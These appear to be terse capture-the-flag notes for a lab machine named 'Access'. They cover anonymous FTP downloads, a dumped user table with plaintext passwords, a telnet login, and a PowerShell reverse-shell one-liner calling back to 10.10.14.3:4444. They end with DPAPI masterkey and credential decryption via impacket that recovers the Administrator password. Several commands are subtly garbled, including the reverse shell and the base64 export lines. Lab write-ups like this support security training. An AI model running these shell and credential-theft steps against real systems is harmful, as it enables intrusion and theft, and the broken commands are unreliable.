Access

ftp 10.10.10.98

anonymous

wget --no-passive-ftp ftp://anonymous:@10.10.10.98/Backups/backup.mdb

wget --no-passive-ftp ftp://anonymous:@10.10.10.98/Engineer/"Access Control.zip"

Abrir archivo .mdb - Microsoft Access

auth_user

id	username	password	Status	last_login	RoleID
25	admin	admin	1	23/08/2018 21:11:47	26
27	engineer	access4u@security	1	23/08/2018 21:13:36	26
28	backup_admin	admin	1	23/08/2018 21:14:02	26

Abrir archivo .pst - Outlook

Configuración > Archivo > Abrir archivo

readpst file.pst

telnet 10.10.10.98

security \ 4Cc3ssC0ntr0ller

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.3',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close("

rlwrap nc -lvnp 4444

$path = "C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580"

[Convert]::ToBase64StringReadAllBytes($path)

impacket-dpapi masterkey -file masterkey.blob -password '4Cc3ssC0ntr0ller' -sid S-1-5-21-953262931-566350628-63446256-1001

$path = "C:\Users\security\AppData\Roaming\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290"

[Convert]::ToBase64StringReadAllBytes($path)

impacket-dpapi credential -file credential.blob -key 0xb360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2

Administrator \ 55Acc3ssS3cur1ty@megacorp